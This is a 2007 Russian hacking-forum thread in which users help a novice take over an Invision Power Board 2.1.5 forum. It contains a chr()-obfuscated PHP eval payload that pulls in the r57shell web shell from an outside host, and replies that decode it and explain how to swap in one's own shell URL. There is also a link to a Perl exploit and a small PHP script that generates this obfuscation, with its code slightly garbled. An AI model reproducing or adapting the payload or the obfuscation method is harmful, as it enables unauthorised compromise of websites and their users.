Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Проблема с шеллом rst (https://forum.antichat.xyz/showthread.php?t=46858)

_Sniper_ 16.08.2007 15:51
Проблема с шеллом rst
 
Смотрел видео..типо как получить админку в IPB 2.1.5
без использования сплойта.
Всё зделал как было написано (проверил на уязвимость index.php?act=task&ck=' )
Регюсь..логинюсь на форуме...создаю тему..
Содержание темы
Цитата:
eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //
Ну и т.д..ничего не работало т.к тот шелл уже с сервера удалён (rst)
Что можно зделать? Как "перекодировать" ссылку (ведь она мертва) на СВОЙ шелл..
Жду помощи.

+toxa+ 16.08.2007 16:10
Ну ты кнешн в нужном месте создал тему.
https://forum.antichat.ru/showpost.php?p=437257&postcount=11

А®ТеS 16.08.2007 16:25
Обисняю. тут ASCII коды символов. Если это расшифровать то будет так:
include "http://rst.void.ru/download/r57shell.txt";/*
Тебе нужно изменить адрес ссылки и снова загнать в ASCII коды, можешь посмотреть соответствия по таблице или написать программку, это дело 5 минут :).
З.Ы. RST рулез, жаль что закрылись :(.

_Sniper_ 16.08.2007 16:25
Можно видео по юзанью? А то я чёт ничего не понял..


И ещё...посмотрите вот это видео.. по поводу этого шелла.
http://pro-hack.ru/download/video/files/Video_ipb.rar

А®ТеS 16.08.2007 16:44
Видео по юзанью чего? КАк загонять в ASCII или сплоит ссылку на который дал +toxa+?))) Думаю что про сплоит, короче он перле, ставишь на машину ActivePERL и ноу проблем, в сплоите кстати есть комментарии и довольно подробные по юзанью. а теску ты и правда сунул малясь нетуда.

_Sniper_ 16.08.2007 17:27
Цитата:
Сообщение от А®ТеS
Обисняю. тут ASCII коды символов. Если это расшифровать то будет так:
include "http://rst.void.ru/download/r57shell.txt";/*
Тебе нужно изменить адрес ссылки и снова загнать в ASCII коды, можешь посмотреть соответствия по таблице или написать программку, это дело 5 минут :).
З.Ы. RST рулез, жаль что закрылись :(.
Есть софт для шифровки\расшифровки? Или где можно зашифровать\расшифровать?

n1†R0x 16.08.2007 18:22
Цитата:
Сообщение от _Sniper_
Есть софт для шифровки\расшифровки? Или где можно зашифровать\расшифровать?
хз, есть или нет, накатал за 10 мин

PHP код:
<?php
    print "<form method = 'post'><textarea name = 'string' cols = '100' rows = '20'></textarea><br /><br />";
    print "<input type = 'submit' value = 'Send >>' /></form>";
    if (isset($_POST["string"]))
        {
            print "eval( ";
            for ($i=0$i<strlen($string); $i++)
            {
                $arr[] = substr($string$i1);
                print "chr(".ord($arr[$i]).")";
                ($i+!== strlen($string)) ? print ". " : print " ";
            }
            print "); //";
        }
?>
Должно работать

зы: в асю уже написали.. по поводу массива - конечно, можно и без него, просто у меня немного другие планы появились, пока писал скрипт)


Время: 10:41